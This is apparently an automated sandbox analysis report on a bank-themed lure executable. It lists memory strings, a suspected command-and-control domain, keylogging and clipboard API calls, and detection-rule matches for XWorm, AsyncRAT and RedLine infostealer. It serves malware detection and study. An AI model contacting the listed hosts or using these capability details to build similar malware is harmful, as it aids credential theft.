Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/x
Source: alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/
Source: alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/N
Source: alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280
Source: alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280LocationETagAuthentication-InfoAgeAccept-Ra
Source: alg.exe, 00000002.00000003.1328245615.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280hv
Source: alg.exe, 00000002.00000003.1322367769.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1559227442.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ww12.przvgke.biz:80/uhxgrttve?usid=25&utid=9755593280PU
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: alg.exe, 00000002.00000003.1439852307.0000000001550000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA60D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD84481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: alg.exe, 00000002.00000003.2038298699.0000000001450000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: alg.exe, 00000002.00000003.1550726071.0000000001550000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000002.00000003.1551610424.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1551415000.0000000001550000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: alg.exe, 00000002.00000003.2038429513.0000000001450000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: alg.exe, 00000002.00000003.2038532715.0000000001450000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000002.00000003.2038532715.0000000001450000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000002.00000003.2038004148.0000000001450000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: powershell.exe, 0000000E.00000002.1437482472.000001FEB6143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: alg.exe, 00000002.00000003.1347358368.00000000014D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.7-zip.org/
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00474164
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00473F66
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_0046001C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0048CABC

System Summary

Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.niellist.exe.4000000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.niellist.exe.4d10000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: This is a third-party compiled AutoIt script. 0_2_00403B3A
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_20f5931f-3
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_b2fc1c23-a
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_14cc24f3-2
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_e18844d4-5
Source: niellist.exe, 00000003.00000002.1291644202.00000000004B4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b90dfd7b-4
Source: niellist.exe, 00000003.00000002.1291644202.00000000004B4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_574a7881-b
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_bd2db06b-0
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_e6f7d0dc-3
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_0046A1EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00458310
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_004651BD
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0040E6A0 0_2_0040E6A0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0042D975 0_2_0042D975
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004221C5 0_2_004221C5
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004362D2 0_2_004362D2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004803DA 0_2_004803DA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0043242E 0_2_0043242E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004225FA 0_2_004225FA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0045E616 0_2_0045E616
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004166E1 0_2_004166E1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0043878F 0_2_0043878F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00436844 0_2_00436844
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00480857 0_2_00480857
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00418808 0_2_00418808
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00468889 0_2_00468889
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0042CB21 0_2_0042CB21
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00436DB6 0_2_00436DB6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00416F9E 0_2_00416F9E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00413030 0_2_00413030
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0042F1D9 0_2_0042F1D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00423187 0_2_00423187
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00401287 0_2_00401287
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00421484 0_2_00421484
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00415520 0_2_00415520
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00427696 0_2_00427696
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00415760 0_2_00415760
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00421978 0_2_00421978
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0055BCC8 0_2_0055BCC8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0040FCE0 0_2_0040FCE0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00487DDB 0_2_00487DDB
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00421D90 0_2_00421D90
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0042BDA6 0_2_0042BDA6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0040DF00 0_2_0040DF00
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00413FE0 0_2_00413FE0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B100D9 0_2_00B100D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AD6EAF 0_2_00AD6EAF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AD51EE 0_2_00AD51EE
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B0D580 0_2_00B0D580
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B03780 0_2_00B03780
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B0C7F0 0_2_00B0C7F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B139A3 0_2_00B139A3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B05980 0_2_00B05980
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AD7B71 0_2_00AD7B71
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AD7F80 0_2_00AD7F80
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00D71360 0_2_00D71360
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AE39A3 3_2_00AE39A3
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AD5980 3_2_00AD5980
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AA6EAF 3_2_00AA6EAF
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AA51EE 3_2_00AA51EE
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00ADD580 3_2_00ADD580
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AA7F80 3_2_00AA7F80
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AD3780 3_2_00AD3780
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00ADC7F0 3_2_00ADC7F0
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00CEA410 3_2_00CEA410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00408C60 9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0040DC11 9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00407C3F 9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00418CCC 9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00406CA0 9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004028B0 9_2_004028B0
